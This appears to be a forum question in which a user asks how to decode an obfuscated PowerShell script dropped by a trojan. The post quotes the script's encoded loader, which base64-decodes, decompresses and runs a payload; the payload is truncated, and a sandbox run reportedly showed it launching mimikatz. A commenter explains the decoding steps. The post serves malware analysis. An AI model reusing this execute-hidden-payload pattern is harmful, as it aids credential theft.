0

I found a powershell script dropped by a trojan, I am not familiar with powershell. So I am just curious to see what it looks like inside but the script is encoded and I am not able to decode by basic means of base64 decoding.

I have tried these solutions:

Decoding base64 with powershell.

https://www.base64decode.org/

and a base64decoder application from a developer with an encoded.dec file but that fails aswell saying that something is not base64 character.

Invoke-Expression $(New-Object IO.StreamReader ($(New-Object IO.Compression.DeflateStream ($(New-Object IO.MemoryStream (,$([Convert]::FromBase64String('7b0HYBxJliUmL23Ke39K9UrX4HShCIBgEyTYkEAQ7MGIzeaS7B1pRyMpqyqBymVWZV1mFkDM7Z28995777333nvvvfe6O51OJ/

...499 word pages later ...

V6CuHdj+nTu/cfL/AA==')))), [IO.Compression.CompressionMode]::Decompress)), [Text.Encoding]::ASCII)).ReadToEnd();

I am not sure what the output should be as I am not experienced with powershell scripts. I have run the script on a sandbox website by name of app.any.run and it opens "mimikatz" password extractor.

KwZc
  • 1
  • 2
  • The code base64-decodes the data string, converts it to a memory stream, uncompresses it, reads the resulting uncompressed stream, and executes the resulting text. That's a common pattern with PowerShell malware. You can do the decoding by doing individual steps in this matrjoshkommand from the inside out and assigning the result of each step to a variable: `$s = '7b0H...'; $b64 = [Convert]::FromBase64String($s); ...` – Ansgar Wiechers May 13 '19 at 22:14
  • Thank you, will have a go at this later today. – KwZc May 21 '19 at 07:40

0 Answers0